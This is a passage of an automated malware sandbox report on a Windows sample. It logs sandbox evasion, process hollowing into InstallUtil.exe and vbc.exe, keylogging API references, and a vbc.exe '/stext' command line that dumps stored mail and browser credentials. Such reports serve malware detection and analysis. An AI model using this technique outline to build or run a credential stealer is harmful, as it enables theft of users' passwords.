            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 3516Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 3588Thread sleep time: -140000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1276Thread sleep time: -46000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 5508Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004161B0 memset,GetSystemInfo,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 120000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 140000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            .NET source code references suspicious native API functionsShow sources
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 12.2.InstallUtil.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: A08008
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Users\user\Desktop\ypBoHI5G3x.exe VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
